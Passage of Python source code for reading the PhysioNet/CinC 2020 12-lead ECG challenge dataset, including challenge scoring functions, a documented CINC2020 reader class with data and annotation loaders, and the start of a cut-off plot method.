piecewise constant with TPR/recall (x-axis) and PPV/precision # (y-axis) for class k. for j in range(num_thresholds-1): auroc[k] += 0.5 * (tpr[j+1] - tpr[j]) * (tnr[j+1] + tnr[j]) auprc[k] += (tpr[j+1] - tpr[j]) * ppv[j+1] # Compute macro AUROC and macro AUPRC across classes. macro_auroc = np.nanmean(auroc) macro_auprc = np.nanmean(auprc) return macro_auroc, macro_auprc # Compute modified confusion matrix for multi-class, multi-label tasks. def compute_modified_confusion_matrix(labels:np.ndarray, outputs:np.ndarray) -> np.ndarray: """ checked, Compute a binary multi-class, multi-label confusion matrix, where the rows are the labels and the columns are the outputs. """ num_recordings, num_classes = np.shape(labels) A = np.zeros((num_classes, num_classes)) # Iterate over all of the recordings. for i in range(num_recordings): # Calculate the number of positive labels and/or outputs. normalization = float(max(np.sum(np.any((labels[i, :], outputs[i, :]), axis=0)), 1)) # Iterate over all of the classes. for j in range(num_classes): # Assign full and/or partial credit for each positive class. if labels[i, j]: for k in range(num_classes): if outputs[i, k]: A[j, k] += 1.0/normalization return A # Compute the evaluation metric for the Challenge. def compute_challenge_metric(weights:np.ndarray, labels:np.ndarray, outputs:np.ndarray, classes:List[str], normal_class:str) -> float: """ checked, """ num_recordings, num_classes = np.shape(labels) normal_index = classes.index(normal_class) # Compute the observed score. A = compute_modified_confusion_matrix(labels, outputs) observed_score = np.nansum(weights * A) # Compute the score for the model that always chooses the correct label(s). correct_outputs = labels A = compute_modified_confusion_matrix(labels, correct_outputs) correct_score = np.nansum(weights * A) # Compute the score for the model that always chooses the normal class. inactive_outputs = np.zeros((num_recordings, num_classes), dtype=np.bool) inactive_outputs[:, normal_index] = 1 A = compute_modified_confusion_matrix(labels, inactive_outputs) inactive_score = np.nansum(weights * A) if correct_score != inactive_score: normalized_score = float(observed_score - inactive_score) / float(correct_score - inactive_score) else: normalized_score = 0.0 return normalized_score # alias compute_metrics = compute_challenge_metric
# -*- coding: utf-8 -*- """ """ import os, io, sys import re import json import time # import pprint from copy import deepcopy from datetime import datetime from typing import Union, Optional, Any, List, Dict, Tuple, Set, Sequence, NoReturn from numbers import Real, Number import numpy as np np.set_printoptions(precision=5, suppress=True) import pandas as pd import wfdb from scipy.io import loadmat from scipy.signal import resample, resample_poly from ...cfg import CFG from ...utils.misc import ( get_record_list_recursive, get_record_list_recursive3, ms2samples, dict_to_str, ensure_siglen, ) from ...utils import ecg_arrhythmia_knowledge as EAK from ..aux_data.cinc2020_aux_data import ( dx_mapping_all, dx_mapping_scored, dx_mapping_unscored, normalize_class, abbr_to_snomed_ct_code, df_weights_abbr, equiv_class_dict, ) from ..base import PhysioNetDataBase, DEFAULT_FIG_SIZE_PER_SEC __all__ = [ "CINC2020", "compute_metrics", "compute_all_metrics", ] # configurations for visualization PlotCfg = CFG() # default const for the plot function in dataset.py # used only when corr. values are absent # all values are time bias w.r.t. corr. peaks, with units in ms PlotCfg.p_onset = -40 PlotCfg.p_offset = 40 PlotCfg.q_onset = -20 PlotCfg.s_offset = 40 PlotCfg.qrs_radius = 60 PlotCfg.t_onset = -100 PlotCfg.t_offset = 60 class CINC2020(PhysioNetDataBase): """ finished, under improving, Classification of 12-lead ECGs: the PhysioNet/Computing in Cardiology Challenge 2020 ABOUT CINC2020 -------------- 0. There are 6 difference tranches of training data, listed as follows: A. 6,877 recordings from China Physiological Signal Challenge in 2018 (CPSC2018): PhysioNetChallenge2020_Training_CPSC.tar.gz in ref. [6] B. 3,453 recordings from China 12-Lead ECG Challenge Database (unused data from CPSC2018 and NOT the CPSC2018 test data): PhysioNetChallenge2020_Training_2.tar.gz in ref. [6] C. 74 recordings from the St Petersburg INCART 12-lead Arrhythmia Database: PhysioNetChallenge2020_Training_StPetersburg.tar.gz in ref. [6] D. 516 recordings from the PTB Diagnostic ECG Database: PhysioNetChallenge2020_Training_PTB.tar.gz in ref. [6] E. 21,837 recordings from the PTB-XL electrocardiography Database: PhysioNetChallenge2020_PTB-XL.tar.gz in ref. [6] F. 10,344 recordings from a Georgia 12-Lead ECG Challenge Database: PhysioNetChallenge2020_Training_E.tar.gz in ref. [6] In total, 43,101 labeled recordings of 12-lead ECGs from four countries (China, Germany, Russia, and the USA) across 3 continents have been posted publicly for this Challenge, with approximately the same number hidden for testing, representing the largest public collection of 12-lead ECGs 1. the A tranche training data comes from CPSC2018, whose folder name is `Training_WFDB`. The B tranche training data are unused training data of CPSC2018, having folder name `Training_2`. For these 2 tranches, ref. the docstring of `database_reader.cpsc_databases.cpsc2018.CPSC2018` 2. C. D. E. tranches of training data all come from corresponding PhysioNet dataset, whose details can be found in corresponding files: C: database_reader.physionet_databases.incartdb.INCARTDB D: database_reader.physionet_databases.ptbdb.PTBDB E: database_reader.physionet_databases.ptb_xl.PTB_XL the C tranche has folder name `Training_StPetersburg`, the D tranche has folder name `Training_PTB`, the F tranche has folder name `WFDB` 3. the F tranche is entirely new, posted for this Challenge, and represents a unique demographic of the Southeastern United States. It has folder name `Training_E/WFDB`. 4. only a part of diagnosis_abbr (diseases that appear in the labels of the 6 tranches of training data) are used in the scoring function (ref. `dx_mapping_scored_cinc2020`), while others are ignored (ref. `dx_mapping_unscored_cinc2020`). The scored diagnoses were chosen based on prevalence of the diagnoses in the training data, the severity of the diagnoses, and the ability to determine the diagnoses from ECG recordings. The ignored diagnosis_abbr can be put in a a "non-class" group. 5. the (updated) scoring function has a scoring matrix with nonzero off-diagonal elements. This scoring function reflects the clinical reality that some misdiagnoses are more harmful than others and should be scored accordingly. Moreover, it reflects the fact that confusing some classes is much less harmful than confusing other classes. 6. sampling frequencies: A. (CPSC2018): 500 Hz B. (CPSC2018-2): 500 Hz C. (INCART): 257 Hz D. (PTB): 1000 Hz E. (PTB-XL): 500 Hz F. (Georgia): 500 Hz 7. all data are recorded in the leads ordering of ["I", "II", "III", "aVR", "aVL", "aVF", "V1", "V2", "V3", "V4", "V5", "V6"] using for example the following code: >>> db_dir = "/media/cfs/wenhao71/data/cinc2020_data/" >>> working_dir = "./working_dir" >>> dr = CINC2020Reader(db_dir=db_dir,working_dir=working_dir) >>> set_leads = [] >>> for tranche, l_rec in dr.all_records.items(): ... for rec in l_rec: ... ann = dr.load_ann(rec) ... leads = ann["df_leads"]["lead_name"].values.tolist() ... if leads not in set_leads: ... set_leads.append(leads) NOTE ---- 1. The datasets have been roughly processed to have a uniform format, hence differ from their original resource (e.g. differe in sampling frequency, sample duration, etc.) 2. The original datasets might have richer metadata (especially those from PhysioNet), which can be fetched from corresponding reader's docstring or website of the original source 3. Each sub-dataset might have its own organizing scheme of data, which should be carefully dealt with 4. There are few "absolute" diagnoses in 12 lead ECGs, where large discrepancies in the interpretation of the ECG can be found even inspected by experts. There is inevitably something lost in translation, especially when you do not have the context. This doesn"t mean making an algorithm isn't important 5. The labels are noisy, which one has to deal with in all real world data 6. each line of the following classes are considered the same (in the scoring matrix): - RBBB, CRBBB (NOT including IRBBB) - PAC, SVPB - PVC, VPB 7. unfortunately, the newly added tranches (C - F) have baseline drift and are much noisier. In contrast, CPSC data have had baseline removed and have higher SNR 8. on Aug. 1, 2020, adc gain (including "resolution", "ADC"? in .hea files) of datasets INCART, PTB, and PTB-xl (tranches C, D, E) are corrected. After correction, (the .tar files of) the 3 datasets are all put in a "WFDB" subfolder. In order to keep the structures consistant, they are moved into "Training_StPetersburg", "Training_PTB", "WFDB" as previously. Using the following code, one can check the adc_gain and baselines of each tranche: >>> db_dir = "/media/cfs/wenhao71/data/cinc2020_data/" >>> working_dir = "./working_dir" >>> dr = CINC2020(db_dir=db_dir,working_dir=working_dir) >>> resolution = {tranche: set() for tranche in "ABCDEF"} >>> baseline = {tranche: set() for tranche in "ABCDEF"} >>> for tranche, l_rec in dr.all_records.items(): ... for rec in l_rec: ... ann = dr.load_ann(rec) ... resolution[tranche] = resolution[tranche].union(set(ann["df_leads"]["adc_gain"])) ... baseline[tranche] = baseline[tranche].union(set(ann["df_leads"]["baseline"])) >>> print(resolution, baseline) {"A": {1000.0}, "B": {1000.0}, "C": {1000.0}, "D": {1000.0}, "E": {1000.0}, "F": {1000.0}} {"A": {0}, "B": {0}, "C": {0}, "D": {0}, "E": {0}, "F": {0}} 9. the .mat files all contain digital signals, which has to be converted to physical values using adc gain, basesline, etc. in corresponding .hea files. `wfdb.rdrecord` has already done this conversion, hence greatly simplifies the data loading process. NOTE that there"s a difference when using `wfdb.rdrecord`: data from `loadmat` are in "channel_first" format, while `wfdb.rdrecord.p_signal` produces data in the "channel_last" format 10. there"re 3 equivalent (2 classes are equivalent if the corr. value in the scoring matrix is 1): (RBBB, CRBBB), (PAC, SVPB), (PVC, VPB) 11. in the newly (Feb., 2021) created dataset (ref. [7]), header files of each subset were gathered into one separate compressed file. This is due to the fact that updates on the dataset are almost always done in the header files. The correct usage of ref. [7], after uncompressing, is replacing the header files in the folder `All_training_WFDB` by header files from the 6 folders containing all header files from the 6 subsets. ISSUES ------ 1. reading the .hea files, baselines of all records are 0, however it is not the case if one plot the signal 2. about half of the LAD records satisfy the "2-lead" criteria, but fail for the "3-lead" criteria, which means that their axis is (-30°, 0°) which is not truely LAD 3. (Aug. 15, 2020; resolved, and changed to 1000) tranche F, the Georgia subset, has ADC gain 4880 which might be too high. Thus obtained voltages are too low. 1000 might be a suitable (correct) value of ADC gain for this tranche just as the other tranches. 4. "E04603" (all leads), "E06072" (chest leads, epecially V1-V3), "E06909" (lead V2), "E07675" (lead V3), "E07941" (lead V6), "E08321" (lead V6) has exceptionally large values at rpeaks, reading (`load_data`) these two records using `wfdb` would bring in `nan` values. One can check using the following code >>> rec = "E04603" >>> dr.plot(rec, dr.load_data(rec, backend="scipy", units="uv")) # currently raising error Usage ----- 1. ECG arrhythmia detection References ---------- [1] https://physionetchallenges.github.io/2020/ [2] http://2018.icbeb.org/# [3] https://physionet.org/content/incartdb/1.0.0/ [4] https://physionet.org/content/ptbdb/1.0.0/ [5] https://physionet.org/content/ptb-xl/1.0.1/ [6] (deprecated) https://storage.cloud.google.com/physionet-challenge-2020-12-lead-ecg-public/ [7] (recommended) https://storage.cloud.google.com/physionetchallenge2021-public-datasets/ """ def __init__(self, db_dir:str, working_dir:Optional[str]=None, verbose:int=2, **kwargs:Any) -> NoReturn: """ Parameters ---------- db_dir: str, storage path of the database working_dir: str, optional, working directory, to store intermediate files and log file verbose: int, default 2, log verbosity kwargs: auxilliary key word arguments """ super().__init__(db_name="CINC2020", db_dir=db_dir, working_dir=working_dir, verbose=verbose, **kwargs) self.rec_ext = "mat" self.ann_ext = "hea" self.db_tranches = list("ABCDEF") self.tranche_names = CFG({ "A": "CPSC", "B": "CPSC-Extra", "C": "StPetersburg", "D": "PTB", "E": "PTB-XL", "F": "Georgia", }) self.rec_prefix = CFG({ "A": "A", "B": "Q", "C": "I", "D": "S", "E": "HR", "F": "E", }) self.db_dir_base = db_dir self.db_dirs = CFG({tranche:"" for tranche in self.db_tranches}) self._all_records = None self._ls_rec() # loads file system structures into self.db_dirs and self._all_records self._diagnoses_records_list = None self._ls_diagnoses_records() self.fs = { "A": 500, "B": 500, "C": 257, "D": 1000, "E": 500, "F": 500, } self.spacing = {t: 1000 / f for t,f in self.fs.items()} self.all_leads = deepcopy(EAK.Standard12Leads) self._all_leads_set = set(self.all_leads) self.df_ecg_arrhythmia = dx_mapping_all[["Dx","SNOMED CT Code","Abbreviation"]] self.ann_items = [ "rec_name", "nb_leads","fs","nb_samples","datetime","age","sex", "diagnosis","df_leads", "medical_prescription","history","symptom_or_surgery", ] self.label_trans_dict = equiv_class_dict.copy() # self.value_correction_factor = CFG({tranche:1 for tranche in self.db_tranches}) # self.value_correction_factor.F = 4.88 # ref. ISSUES 3 self.exceptional_records = ["E04603", "E06072", "E06909", "E07675", "E07941", "E08321"] # ref. ISSUES 4 def get_subject_id(self, rec:str) -> int: """ finished, checked, Parameters ---------- rec: str, name of the record Returns ------- sid: int, the `subject_id` corr. to `rec` """ s2d = {"A":"11", "B":"12", "C":"21", "D":"31", "E":"32", "F":"41"} s2d = {self.rec_prefix[k]:v for k,v in s2d.items()} prefix = "".join(re.findall(r"[A-Z]", rec)) n = rec.replace(prefix,"") sid = int(f"{s2d[prefix]}{'0'*(8-len(n))}{n}") return sid def _ls_rec(self) -> NoReturn: """ finished, checked, list all the records and load into `self._all_records`, facilitating further uses """ fn = "record_list.json" record_list_fp = os.path.join(self.db_dir_base, fn) if os.path.isfile(record_list_fp): with open(record_list_fp, "r") as f: self._all_records = {k:v for k,v in json.load(f).items() if k in self.tranche_names} for tranche in self.db_tranches: self.db_dirs[tranche] = os.path.join(self.db_dir_base, os.path.dirname(self._all_records[tranche][0])) self._all_records[tranche] = [os.path.basename(f) for f in self._all_records[tranche]] else: print("Please wait patiently to let the reader find all records of all the tranches...") start = time.time() rec_patterns_with_ext = { tranche: f"^{self.rec_prefix[tranche]}(?:\d+).{self.rec_ext}$" \ for tranche in self.db_tranches } self._all_records = \ get_record_list_recursive3(self.db_dir_base, rec_patterns_with_ext) to_save = deepcopy(self._all_records) for tranche in self.db_tranches: tmp_dirname = [ os.path.dirname(f) for f in self._all_records[tranche] ] if len(set(tmp_dirname)) != 1: if len(set(tmp_dirname)) > 1: raise ValueError(f"records of tranche {tranche} are stored in several folders!") else: raise ValueError(f"no record found for tranche {tranche}!") self.db_dirs[tranche] = os.path.join(self.db_dir_base, tmp_dirname[0]) self._all_records[tranche] = [os.path.basename(f) for f in self._all_records[tranche]] print(f"Done in {time.time() - start:.5f} seconds!") with open(os.path.join(self.db_dir_base, fn), "w") as f: json.dump(to_save, f) def _ls_diagnoses_records(self) -> NoReturn: """ finished, checked, list all the records for all diagnoses """ fn = "diagnoses_records_list.json" dr_fp = os.path.join(self.db_dir_base, fn) if os.path.isfile(dr_fp): with open(dr_fp, "r") as f: self._diagnoses_records_list = json.load(f) else: print("Please wait several minutes patiently to let the reader list records for each diagnosis...") start = time.time() self._diagnoses_records_list = {d: [] for d in df_weights_abbr.columns.values.tolist()} for tranche, l_rec in self._all_records.items(): for rec in l_rec: ann = self.load_ann(rec) ld = ann["diagnosis_scored"]["diagnosis_abbr"] for d in ld: self._diagnoses_records_list[d].append(rec) print(f"Done in {time.time() - start:.5f} seconds!") with open(dr_fp, "w") as f: json.dump(self._diagnoses_records_list, f) self._all_records = CFG(self._all_records) @property def diagnoses_records_list(self): """ finished, checked, """ if self._diagnoses_records_list is None: self._ls_diagnoses_records() return self._diagnoses_records_list def _get_tranche(self, rec:str) -> str: """ finished, checked, get the tranche"s symbol (one of "A","B","C","D","E","F") of a record via its name Parameters ---------- rec: str, name of the record Returns ------- tranche, str, symbol of the tranche, ref. `self.rec_prefix` """ prefix = "".join(re.findall(r"[A-Z]", rec)) tranche = {v:k for k,v in self.rec_prefix.items()}[prefix] return tranche def get_data_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, get the absolute file path of the data file of `rec` Parameters ---------- rec: str, name of the record with_ext: bool, default True, if True, the returned file path comes with file extension, otherwise without file extension, which is useful for `wfdb` functions Returns ------- fp: str, absolute file path of the data file of the record """ tranche = self._get_tranche(rec) fp = os.path.join(self.db_dirs[tranche], f"{rec}.{self.rec_ext}") if not with_ext: fp = os.path.splitext(fp)[0] return fp def get_header_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, get the absolute file path of the header file of `rec` Parameters ---------- rec: str, name of the record with_ext: bool, default True, if True, the returned file path comes with file extension, otherwise without file extension, which is useful for `wfdb` functions Returns ------- fp: str, absolute file path of the header file of the record """ tranche = self._get_tranche(rec) fp = os.path.join(self.db_dirs[tranche], f"{rec}.{self.ann_ext}") if not with_ext: fp = os.path.splitext(fp)[0] return fp def get_ann_filepath(self, rec:str, with_ext:bool=True) -> str: """ finished, checked, alias for `get_header_filepath` """ fp = self.get_header_filepath(rec, with_ext=with_ext) return fp def load_data(self, rec:str, leads:Optional[Union[str, List[str]]]=None, data_format:str="channel_first", backend:str="wfdb", units:str="mV", fs:Optional[Real]=None) -> np.ndarray: """ finished, checked, load physical (converted from digital) ecg data, which is more understandable for humans Parameters ---------- rec: str, name of the record leads: str or list of str, optional, the leads to load data_format: str, default "channel_first", format of the ecg data, "channel_last" (alias "lead_last"), or "channel_first" (alias "lead_first") backend: str, default "wfdb", the backend data reader, can also be "scipy" units: str, default "mV", units of the output signal, can also be "μV", with an alias of "uV" fs: real number, optional, if not None, the loaded data will be resampled to this frequency Returns ------- data: ndarray, the ecg data """ assert data_format.lower() in ["channel_first", "lead_first", "channel_last", "lead_last"] tranche = self._get_tranche(rec) if not leads: _leads = self.all_leads elif isinstance(leads, str): _leads = [leads] else: _leads = leads # if tranche in "CD" and fs == 500: # resample will be done at the end of the function # data = self.load_resampled_data(rec) if backend.lower() == "wfdb": rec_fp = self.get_data_filepath(rec, with_ext=False) # p_signal of "lead_last" format wfdb_rec = wfdb.rdrecord(rec_fp, physical=True, channel_names=_leads) data = np.asarray(wfdb_rec.p_signal.T) # lead_units = np.vectorize(lambda s: s.lower())(wfdb_rec.units) elif backend.lower() == "scipy": # loadmat of "lead_first" format rec_fp = self.get_data_filepath(rec, with_ext=True) data = loadmat(rec_fp)["val"] header_info = self.load_ann(rec, raw=False)["df_leads"] baselines = header_info["baseline"].values.reshape(data.shape[0], -1) adc_gain = header_info["adc_gain"].values.reshape(data.shape[0], -1) data = np.asarray(data-baselines) / adc_gain leads_ind = [self.all_leads.index(item) for item in _leads] data = data[leads_ind,:] # lead_units = np.vectorize(lambda s: s.lower())(header_info["df_leads"]["adc_units"].values) else: raise ValueError(f"backend `{backend.lower()}` not supported for loading data") # ref. ISSUES 3, for multiplying `value_correction_factor` # data = data * self.value_correction_factor[tranche] if units.lower() in ["uv", "μv"]: data = data * 1000 if fs is not None and fs != self.fs[tranche]: data = resample_poly(data, fs, self.fs[tranche], axis=1) if data_format.lower() in ["channel_last", "lead_last"]: data = data.T return data def load_ann(self, rec:str, raw:bool=False, backend:str="wfdb") -> Union[dict,str]: """ finished, checked, load annotations (header) stored in the .hea files Parameters ---------- rec: str, name of the record raw: bool, default False, if True, the raw annotations without parsing will be returned backend: str, default "wfdb", case insensitive, if is "wfdb", `wfdb.rdheader` will be used to load the annotations; if is "naive", annotations will be parsed from the lines read from the header files Returns ------- ann_dict, dict or str, the annotations with items: ref. `self.ann_items` """ tranche = self._get_tranche(rec) ann_fp = self.get_ann_filepath(rec, with_ext=True) with open(ann_fp, "r") as f: header_data = f.read().splitlines() if raw: ann_dict = "\n".join(header_data) return ann_dict if backend.lower() == "wfdb": ann_dict = self._load_ann_wfdb(rec, header_data) elif backend.lower() == "naive": ann_dict = self._load_ann_naive(header_data) else: raise ValueError(f"backend `{backend.lower()}` not supported for loading annotations") return ann_dict def _load_ann_wfdb(self, rec:str, header_data:List[str]) -> dict: """ finished, checked, Parameters ---------- rec: str, name of the record header_data: list of str, list of lines read directly from a header file, complementary to data read using `wfdb.rdheader` if applicable, this data will be used, since `datetime` is not well parsed by `wfdb.rdheader` Returns ------- ann_dict, dict, the annotations with items: ref. `self.ann_items` """ header_fp = self.get_header_filepath(rec, with_ext=False) header_reader = wfdb.rdheader(header_fp) ann_dict = {} ann_dict["rec_name"], ann_dict["nb_leads"], ann_dict["fs"], ann_dict["nb_samples"], ann_dict["datetime"], daytime = header_data[0].split(" ") ann_dict["nb_leads"] = int(ann_dict["nb_leads"]) ann_dict["fs"] = int(ann_dict["fs"]) ann_dict["nb_samples"] = int(ann_dict["nb_samples"]) ann_dict["datetime"] = datetime.strptime(" ".join([ann_dict["datetime"], daytime]), "%d-%b-%Y %H:%M:%S") try: # see NOTE. 1. ann_dict["age"] = int([l for l in header_reader.comments if "Age" in l][0].split(": ")[-1]) except: ann_dict["age"] = np.nan try: ann_dict["sex"] = [l for l in header_reader.comments if "Sex" in l][0].split(": ")[-1] except: ann_dict["sex"] = "Unknown" try: ann_dict["medical_prescription"] = [l for l in header_reader.comments if "Rx" in l][0].split(": ")[-1] except: ann_dict["medical_prescription"] = "Unknown" try: ann_dict["history"] = [l for l in header_reader.comments if "Hx" in l][0].split(": ")[-1] except: ann_dict["history"] = "Unknown" try: ann_dict["symptom_or_surgery"] = [l for l in header_reader.comments if "Sx" in l][0].split(": ")[-1] except: ann_dict["symptom_or_surgery"] = "Unknown" l_Dx = [l for l in header_reader.comments if "Dx" in l][0].split(": ")[-1].split(",") ann_dict["diagnosis"], ann_dict["diagnosis_scored"] = self._parse_diagnosis(l_Dx) df_leads = pd.DataFrame() for k in ["file_name", "fmt", "byte_offset", "adc_gain", "units", "adc_res", "adc_zero", "baseline", "init_value", "checksum", "block_size", "sig_name"]: df_leads[k] = header_reader.__dict__[k] df_leads = df_leads.rename( columns={ "sig_name": "lead_name", "units":"adc_units", "file_name":"filename", } ) df_leads.index = df_leads["lead_name"] df_leads.index.name = None ann_dict["df_leads"] = df_leads return ann_dict def _load_ann_naive(self, header_data:List[str]) -> dict: """ finished, checked, load annotations (header) using raw data read directly from a header file Parameters ---------- header_data: list of str, list of lines read directly from a header file Returns ------- ann_dict, dict, the annotations with items: ref. `self.ann_items` """ ann_dict = {} ann_dict["rec_name"], ann_dict["nb_leads"], ann_dict["fs"], ann_dict["nb_samples"], ann_dict["datetime"], daytime = header_data[0].split(" ") ann_dict["nb_leads"] = int(ann_dict["nb_leads"]) ann_dict["fs"] = int(ann_dict["fs"]) ann_dict["nb_samples"] = int(ann_dict["nb_samples"]) ann_dict["datetime"] = datetime.strptime(" ".join([ann_dict["datetime"], daytime]), "%d-%b-%Y %H:%M:%S") try: # see NOTE. 1. ann_dict["age"] = int([l for l in header_data if l.startswith("#Age")][0].split(": ")[-1]) except: ann_dict["age"] = np.nan try: ann_dict["sex"] = [l for l in header_data if l.startswith("#Sex")][0].split(": ")[-1] except: ann_dict["sex"] = "Unknown" try: ann_dict["medical_prescription"] = [l for l in header_data if l.startswith("#Rx")][0].split(": ")[-1] except: ann_dict["medical_prescription"] = "Unknown" try: ann_dict["history"] = [l for l in header_data if l.startswith("#Hx")][0].split(": ")[-1] except: ann_dict["history"] = "Unknown" try: ann_dict["symptom_or_surgery"] = [l for l in header_data if l.startswith("#Sx")][0].split(": ")[-1] except: ann_dict["symptom_or_surgery"] = "Unknown" l_Dx = [l for l in header_data if l.startswith("#Dx")][0].split(": ")[-1].split(",") ann_dict["diagnosis"], ann_dict["diagnosis_scored"] = self._parse_diagnosis(l_Dx) ann_dict["df_leads"] = self._parse_leads(header_data[1:13]) return ann_dict def _parse_diagnosis(self, l_Dx:List[str]) -> Tuple[dict, dict]: """ finished, checked, Parameters ---------- l_Dx: list of str, raw information of diagnosis, read from a header file Returns ------- diag_dict:, dict, diagnosis, including SNOMED CT Codes, fullnames and abbreviations of each diagnosis diag_scored_dict: dict, the scored items in `diag_dict` """ diag_dict, diag_scored_dict = {}, {} try: diag_dict["diagnosis_code"] = [item for item in l_Dx] # selection = dx_mapping_all["SNOMED CT Code"].isin(diag_dict["diagnosis_code"]) # diag_dict["diagnosis_abbr"] = dx_mapping_all[selection]["Abbreviation"].tolist() # diag_dict["diagnosis_fullname"] = dx_mapping_all[selection]["Dx"].tolist() diag_dict["diagnosis_abbr"] = \ [ dx_mapping_all[dx_mapping_all["SNOMED CT Code"]==dc]["Abbreviation"].values[0] \ for dc in diag_dict["diagnosis_code"] ] diag_dict["diagnosis_fullname"] = \ [ dx_mapping_all[dx_mapping_all["SNOMED CT Code"]==dc]["Dx"].values[0] \ for dc in diag_dict["diagnosis_code"] ] scored_indices = np.isin(diag_dict["diagnosis_code"], dx_mapping_scored["SNOMED CT Code"].values) diag_scored_dict["diagnosis_code"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_code"]) \ if scored_indices[idx] ] diag_scored_dict["diagnosis_abbr"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_abbr"]) \ if scored_indices[idx] ] diag_scored_dict["diagnosis_fullname"] = \ [ item for idx, item in enumerate(diag_dict["diagnosis_fullname"]) \ if scored_indices[idx] ] except: # the old version, the Dx"s are abbreviations diag_dict["diagnosis_abbr"] = diag_dict["diagnosis_code"] selection = dx_mapping_all["Abbreviation"].isin(diag_dict["diagnosis_abbr"]) diag_dict["diagnosis_fullname"] = dx_mapping_all[selection]["Dx"].tolist() # if not keep_original: # for idx, d in enumerate(ann_dict["diagnosis_abbr"]): # if d in ["Normal", "NSR"]: # ann_dict["diagnosis_abbr"] = ["N"] return diag_dict, diag_scored_dict def _parse_leads(self, l_leads_data:List[str]) -> pd.DataFrame: """ finished, checked, Parameters ---------- l_leads_data: list of str, raw information of each lead, read from a header file Returns ------- df_leads: DataFrame, infomation of each leads in the format of DataFrame """ df_leads = pd.read_csv(io.StringIO("\n".join(l_leads_data)), delim_whitespace=True, header=None) df_leads.columns = ["filename", "fmt+byte_offset", "adc_gain+units", "adc_res", "adc_zero", "init_value", "checksum", "block_size", "lead_name",] df_leads["fmt"] = df_leads["fmt+byte_offset"].apply(lambda s: s.split("+")[0]) df_leads["byte_offset"] = df_leads["fmt+byte_offset"].apply(lambda s: s.split("+")[1]) df_leads["adc_gain"] = df_leads["adc_gain+units"].apply(lambda s: s.split("/")[0]) df_leads["adc_units"] = df_leads["adc_gain+units"].apply(lambda s: s.split("/")[1]) for k in ["byte_offset", "adc_gain", "adc_res", "adc_zero", "init_value", "checksum",]: df_leads[k] = df_leads[k].apply(lambda s: int(s)) df_leads["baseline"] = df_leads["adc_zero"] df_leads = df_leads[["filename", "fmt", "byte_offset", "adc_gain", "adc_units", "adc_res", "adc_zero", "baseline", "init_value", "checksum", "block_size", "lead_name"]] df_leads.index = df_leads["lead_name"] df_leads.index.name = None return df_leads def load_header(self, rec:str, raw:bool=False) -> Union[dict,str]: """ alias for `load_ann`, as annotations are also stored in header files """ return self.load_ann(rec, raw) def get_labels(self, rec:str, scored_only:bool=True, fmt:str="s", normalize:bool=True) -> List[str]: """ finished, checked, read labels (diagnoses or arrhythmias) of a record Parameters ---------- rec: str, name of the record scored_only: bool, default True, only get the labels that are scored in the CINC2020 official phase fmt: str, default "a", the format of labels, one of the following (case insensitive): - "a", abbreviations - "f", full names - "s", SNOMED CT Code normalize: bool, default True, if True, the labels will be transformed into their equavalents, which are defined in `utils.utils_misc.cinc2020_aux_data.py` Returns ------- labels, list, the list of labels """ ann_dict = self.load_ann(rec) if scored_only: labels = ann_dict["diagnosis_scored"] else: labels = ann_dict["diagnosis"] if fmt.lower() == "a": labels = labels["diagnosis_abbr"] elif fmt.lower() == "f": labels = labels["diagnosis_fullname"] elif fmt.lower() == "s": labels = labels["diagnosis_code"] else: raise ValueError(f"`fmt` should be one of `a`, `f`, `s`, but got `{fmt}`") if normalize: labels = [self.label_trans_dict.get(item, item) for item in labels] return labels def get_fs(self, rec:str) -> Real: """ finished, checked, get the sampling frequency of a record Parameters ---------- rec: str, name of the record Returns ------- fs: real number, sampling frequency of the record `rec` """ tranche = self._get_tranche(rec) fs = self.fs[tranche] return fs def get_subject_info(self, rec:str, items:Optional[List[str]]=None) -> dict: """ finished, checked, read auxiliary information of a subject (a record) stored in the header files Parameters ---------- rec: str, name of the record items: list of str, optional, items of the subject's information (e.g. sex, age, etc.) Returns ------- subject_info: dict, information about the subject, including "age", "sex", "medical_prescription", "history", "symptom_or_surgery", """ if items is None or len(items) == 0: info_items = [ "age", "sex", "medical_prescription", "history", "symptom_or_surgery", ] else: info_items = items ann_dict = self.load_ann(rec) subject_info = [ann_dict[item] for item in info_items] return subject_info def save_challenge_predictions(self, rec:str, output_dir:str, scores:List[Real], labels:List[int], classes:List[str]) -> NoReturn: """ NOT finished, NOT checked, need updating, TODO: update for the official phase Parameters ---------- rec: str, name of the record output_dir: str, directory to save the predictions scores: list of real, raw predictions labels: list of int, 0 or 1, binary predictions classes: list of str, SNOMED CT Code of binary predictions """ new_file = f"{rec}.csv" output_file = os.path.join(output_dir, new_file) # Include the filename as the recording number recording_string = f"#{rec}" class_string = ",".join(classes) label_string = ",".join(str(i) for i in labels) score_string = ",".join(str(i) for i in scores) with open(output_file, "w") as f: # f.write(recording_string + "\n" + class_string + "\n" + label_string + "\n" + score_string + "\n") f.write("\n".join([recording_string, class_string, label_string, score_string, ""])) def plot(self, rec:str, data:Optional[np.ndarray]=None, ann:Optional[Dict[str, np.ndarray]]=None, ticks_granularity:int=0, leads:Optional[Union[str, List[str]]]=None, same_range:bool=False, waves:Optional[Dict[str, Sequence[int]]]=None, **kwargs:Any) -> NoReturn: """ finished, checked, to improve, plot the signals of a record or external signals (units in μV), with metadata (fs, labels, tranche, etc.), possibly also along with wave delineations Parameters ---------- rec: str, name of the record data: ndarray, optional, (12-lead) ecg signal to plot, should be of the format "channel_first", and compatible with `leads` if given, data of `rec` will not be used, this is useful when plotting filtered data ann: dict, optional, annotations for `data`, with 2 items: "scored", "all", ignored if `data` is None ticks_granularity: int, default 0, the granularity to plot axis ticks, the higher the more, 0 (no ticks) --> 1 (major ticks) --> 2 (major + minor ticks) leads: str or list of str, optional, the leads to plot same_range: bool, default False, if True, forces all leads to have the same y range waves: dict, optional, indices of the wave critical points, including "p_onsets", "p_peaks", "p_offsets", "q_onsets", "q_peaks", "r_peaks", "s_peaks", "s_offsets", "t_onsets", "t_peaks", "t_offsets" kwargs: dict, TODO ---- 1. slice too long records, and plot separately for each segment 2. plot waves using `axvspan` NOTE ---- `Locator` of `plt` has default `MAXTICKS` equal to 1000, if not modifying this number, at most 40 seconds of signal could be plotted once Contributors: Jeethan, and WEN Hao """ tranche = self._get_tranche(rec) if tranche in "CDE": physionet_lightwave_suffix = CFG({ "C": "incartdb/1.0.0", "D": "ptbdb/1.0.0", "E": "ptb-xl/1.0.1", }) url = 